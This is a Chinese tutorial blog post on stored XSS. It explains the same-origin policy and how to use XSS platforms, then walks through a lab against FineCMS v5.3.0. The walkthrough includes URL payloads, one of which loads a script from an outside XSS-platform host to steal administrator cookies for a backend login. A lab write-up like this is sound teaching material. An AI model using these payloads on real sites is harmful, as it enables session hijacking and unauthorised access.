前言
什么是存储型xss:
提交恶意xss数据,存入数据库中,访问时触发。
存储型xss和反射型xss区别:
存储型存入数据库中,可持续时间长,而反射型持续时间短,仅对本次访问有影响,反射型一般要配合社工。
存储型xss操作过程:
嵌入到了web页面的恶意代码被存储到服务器上,例如你注册时候将用户昵称设置为XSS恶意代码,那么访问某些页面会显示用户名的时候就会触发恶意代码。
存储型xss可能出现的位置:
可以插入数据的地方,比如用户注册,留言板,上传文件的文件名处,管理员可见的报错信息....
同源策略
为什么A站点会填充A站点的Cookie,B站点会填充B站点的Cookie,他们不会相互乱窜?
同源策略:浏览器的同源策略,限制了不同源的Js,对当前页面的资源和属性的权限。同源策略保护了a.com域名下的资源不被来自其他网页的脚本读取或篡改。
所谓同源:需要同 域名/host、端口、协议。
如何使用XSS平台
xss平台的payload怎么使用:
和弹窗一样,直接去加载,一般XSS平台也会提供攻击代码。
xss平台payload作用原理:
访问后触发,去加载平台给出的脚本网址。
常见的XSS平台:
HKSB
XSSPT
XSS8CC
XSSB
访问XSS平台的注意事项:
后台可以看到所有用户的Cookie,当你用了别人的XSS平台其实就要注意信息泄露这个问题,而且访问XSS平台和XSS页面建议使用无痕,天知道,他们会不会在脚本里面做手脚。
注册后先创建项目: |
获取Cookie的话只需要勾选默认模块和xss.js 即可, 在默认模块中有一个keepsession选项,由于cookie具有时效性,勾选的话,就可以保留cookie。 |
直接拿类似的payload插入即可:
存储型XSS靶场实操
1.进入漏洞页面
细看发现这个靶场使用的是通用型源码FineCMS公益软件 v5.3.0
FineCMS v5.3.0存储型XSS简单来说就是可通过构造URL,让后台生成错误日志,而后台对错误日志的内容写入没有进行安全检查,导致写入的内容原原本本的显示在错误日志的页面中,当管理员在后台查看错误日志时,就会触发XSS代码。
2.测试
1)是否弹窗
/index.php?c=mail&m=txtxtx<script>alert("hacker")</script>
2)插入XSS平台生成攻击语句获取Cookie:
/index.php?c=mail&m=txtxtx<sCRiPt sRC=//hk.sb/fNcM></sCrIpT>
3.利用获取的Cookie登录网站后台
网络安全学习资源分享:
给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
因篇幅有限,仅展示部分资料,朋友们如果有需要全套《网络安全入门+进阶学习资源包》,需要点击下方链接即可前往获取
读者福利 | CSDN大礼包:《网络安全入门&进阶学习资源包》免费分享(安全链接,放心点击)
同时每个成长路线对应的板块都有配套的视频提供:
大厂面试题
视频配套资料&国内外网安书籍、文档
当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料
所有资料共282G,朋友们如果有需要全套《网络安全入门+进阶学习资源包》,可以扫描下方二维码或链接免费领取~
读者福利 | CSDN大礼包:《网络安全入门&进阶学习资源包》免费分享(安全链接,放心点击)
特别声明:
此教程为纯技术分享!本教程的目的决不是为那些怀有不良动机的人提供及技术支持!也不承担因为技术被滥用所产生的连带责任!本教程的目的在于最大限度地唤醒大家对网络安全的重视,并采取相应的安全措施,从而减少由网络安全而带来的经济损失。